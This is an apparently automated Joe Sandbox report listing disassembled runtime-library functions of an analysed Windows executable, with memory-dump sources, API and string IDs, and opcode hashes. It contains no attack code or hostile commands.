                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                      • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                      • Instruction ID: 4cbbaa73a43a3f4b39e91f011e3df131ced85e44cc30110a830a55516fbd4564
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF04F61A09B8691EB24AF24A4553BAA721AF45761F940335C67E471F4DF2CD05583E0
                                                                                                                                                                                                      Function 00007FF7FF5A93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                      • Instruction ID: 373582d56bc14f5b79f989221e51d831d5d5636bbf65fbbd04a4fb52ef9f3c97
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F11BF62E4EEF701F7543924D4963F5A0447F58360F840734EBBE872D68E2CA861C1A0
                                                                                                                                                                                                      Function 00007FF7FF59B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B41F
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B43E
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B466
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B477
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B488
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                      • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                      • Instruction ID: 21f75c244663fa12a2c73b7ceab3ba02b868ae5af6446711379f7e5035b369d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49114C20A0DAC642FB7CB72556511F9E2865F847B0FD88334E93E576E6DE2CE50293A0
                                                                                                                                                                                                      Function 00007FF7FF59B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                      • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                      • Instruction ID: 316882c0d52f0d42a96982b0d06deb3e468641e184b38baeaf343e5116f1fc3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92112A24E0928B52FB7CB36544521FDA1858F46770FD88738D93E5B2E2DD2CB50142F1
                                                                                                                                                                                                      Function 00007FF7FF596010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                      • Instruction ID: 50e1d1209a7165d453bee2a0231e885041ac78346e44468ad3a2f770e2c18d7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C491B132A08A8685FB79AF24D4507BDB791AB40B94FC44336DA79473D5DF3CE40A83A1
                                                                                                                                                                                                      Function 00007FF7FF59FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                      • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                      • Instruction ID: 099db035078488b178ef4e75341e2ff237f372823fdb75a7423a4ba6f501a310
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9881C432E0C2C286F7BC6F2581102F8B6E0AB51748FD99235DA39972C5DF2DE90183E1
                                                                                                                                                                                                      Function 00007FF7FF58D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                      • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction ID: d489551160167ab9b0a6567a1cfcfaaeeb678087ee9f8f5455c1602c2fa9376d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D51A232B196818ADB14AF15E044BB8A7D1FB44B98F914230DA7D877C8EF3CE845CB90
                                                                                                                                                                                                      Function 00007FF7FF58EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                      • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction ID: 17ab65d3ae5609a70c0cdbac56963b814ad9c94e18f717db7be9dd65e50831d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1561B432908BC586D760AB15E4407EAFBA0FB89784F444325EBAD07B95DF7CD191CB50
                                                                                                                                                                                                      Function 00007FF7FF58F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                      • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                      • Instruction ID: 6ed6950d718bc4685e13a8d95892edc7af1d3145f7b4974e79e59d24daaf7f10
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26518E329086C286EB64AE2194443A8B6E0FB59B94F944336EABD47BD5CF3CE450C791
                                                                                                                                                                                                      Function 00007FF7FF587E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7FF58352C,?,00000000,00007FF7FF583F23), ref: 00007FF7FF587F22
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                      • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                      • Instruction ID: 32be83ce6d4a459b06ada111c58a9cbcabf97a4ca1fea3de9b4d79cda10e9477
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D531B061619AC145EB21AB21F8507EAA354FF88BE4F840331EE7D47BC9EE2CD645C790
                                                                                                                                                                                                      Function 00007FF7FF582810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                      • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                      • Instruction ID: cd390d2fd8c64561ad633427d078f8982fb251811455d2cae1e41af6ac5b484e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA21E572708B8192E710AB14F8447EAB7A0FB88780F800232EEAD537A5DF3CD255C790
                                                                                                                                                                                                      Function 00007FF7FF59C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                      • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction ID: 524178aa164c67a5b5d14dcd063152a926598bebfe668d04ac25221016ce5405
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D102B2B18AC28AE724DF64D4441EC7771FB44798B848225DE7D97BD9DE38D016C390
                                                                                                                                                                                                      Function 00007FF7FF59F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                      • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction ID: 6d9a180b653529e0fa2ef35c5871fd47761ea4722ef20f83899a1128368b7108
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F651F872F0819186FB28EF2499556FCA7A2AB00358F914335DE3E53AE5DF38E401C790
                                                                                                                                                                                                      Function 00007FF7FF5957EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                      • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                      • Instruction ID: c66ffc659509a44edf585ef93c600a7054aa9cfe150748ff6a9b4cafb3a9e980
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51BF22E086818AFB28EF71D4503FDA3E1AB44B58F948635DE2D476C9DF38D460C3A0
                                                                                                                                                                                                      Function 00007FF7FF5820C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
